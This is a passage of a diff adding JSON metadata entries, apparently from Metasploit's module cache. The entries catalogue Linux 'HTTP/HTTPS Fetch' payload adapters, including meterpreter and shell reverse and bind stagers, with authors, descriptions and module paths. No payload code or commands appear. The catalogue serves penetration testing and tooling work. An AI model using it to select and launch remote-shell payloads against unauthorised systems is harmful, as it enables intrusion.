"linux/x86/meterpreter/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_nonx_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": 
"2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_tcp_uuid": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/http/x86/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 
"payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/x86/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x86/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/x86/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": 
"payload/cmd/linux/http/x86/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/metsvc_bind_tcp": { + "name": "HTTP Fetch, Linux Meterpreter Service, Bind TCP", + "fullname": "payload/cmd/linux/http/x86/metsvc_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/metsvc_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/metsvc_bind_tcp", + "staged": 
false + }, + "payload_cmd/linux/http/x86/metsvc_reverse_tcp": { + "name": "HTTP Fetch, Linux Meterpreter Service, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x86/metsvc_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hdm " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nStub payload for interacting with a Meterpreter Service", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/metsvc_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/metsvc_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/read_file": { + "name": "HTTP Fetch, Linux Read File", + "fullname": "payload/cmd/linux/http/x86/read_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "hal" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nRead up to 4096 bytes from the local file system and write it back out to the specified file descriptor", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/read_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/read_file", + "staged": false + }, + "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for an IPv6 connection with UUID 
Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/http/x86/shell/bind_nonx_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/http/x86/shell/bind_tcp": { + "name": "HTTP Fetch, Linux 
Command Shell, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/http/x86/shell/bind_tcp_uuid": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": 
"cmd/linux/http/x86/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/http/x86/shell/find_tag": { + "name": "HTTP Fetch, Linux Command Shell, Find Tag Stager", + "fullname": "payload/cmd/linux/http/x86/shell/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nUse an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/find_tag", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/http/x86/shell/reverse_ipv6_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP 
server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/shell/reverse_nonx_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_nonx_tcp" + }, + 
"payload_cmd/linux/http/x86/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "tkmru" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp" + }, + "payload_cmd/linux/http/x86/shell/reverse_tcp_uuid": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x86/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": 
"cmd/linux/http/x86/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/shell", + "stager_refname": "linux/x86/reverse_tcp_uuid" + }, + "payload_cmd/linux/http/x86/shell_bind_ipv6_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x86/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection over IPv6 and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + 
"platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_bind_tcp_random_port": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/http/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_find_port": { + "name": 
"HTTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/http/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_find_port", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_find_tag": { + "name": "HTTP Fetch, Linux Command Shell, Find Tag Inline", + "fullname": "payload/cmd/linux/http/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_find_tag", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle ", + "joev " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/shell_reverse_tcp_ipv6": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Matteo Malvica " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": 
"cmd/linux/http/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", + "staged": false + }, + "payload_cmd/linux/https/aarch64/meterpreter/reverse_tcp": { + "name": "HTTPS Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack " + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/aarch64", + "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/https/aarch64/meterpreter_reverse_http": { + "name": "HTTPS Fetch", + "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", + "references": [], + "platform": "Linux", + 
